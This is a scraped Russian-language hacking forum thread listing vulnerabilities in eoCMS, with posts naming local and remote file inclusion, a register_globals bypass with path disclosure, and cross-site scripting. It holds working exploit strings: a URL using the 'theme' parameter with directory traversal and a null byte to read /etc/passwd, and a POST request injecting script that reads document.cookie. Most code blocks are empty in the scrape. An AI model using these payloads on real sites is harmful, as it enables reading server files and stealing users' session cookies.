![]() |
Уязвимости eoCMS
Офф сайт: _http://eocms.com/
LFI В файле Index.php PHP код:
ЗЫ да со скулями поторопился |
Цитата:
PHP код:
|
Цитата:
Warning: include_once() [function.include]: Failed opening '/home/garbages/public_html/eocms.com/language/jhgj\0//Pages.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/garbages/public_html/eocms.com/index.php on line 118 это тока раскрытие путей тогда я не знаю..... PS то что выкладывал скули , они есть но вот реализовать их либо тяжело .либо ни как, пока не пытался :) |
Remote File Inclusion
Требования: register_globals = on Файл: js/bbcodepress/bbcode-form.php PHP код:
|
Вот ещё чуть:
--------------------------------------- Бага: обход unregister_globals и раскрытие пути Условия: register_globals = ON >> framework.php PHP код:
Но если сделать запрос: Код:
POST /index.php?antichat=test HTTP/1.1------------------------------- Бага: LFI Условия: magic_quites = Off >> framework.php PHP код:
exploit: http://eocms/index.php?theme=../../../../../../../etc/passwd%00 ------------------------------ Бага: XSS Условия: register_globals = ON exploit: Код:
POST /index.php?error_die[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1 |
| Время: 16:06 |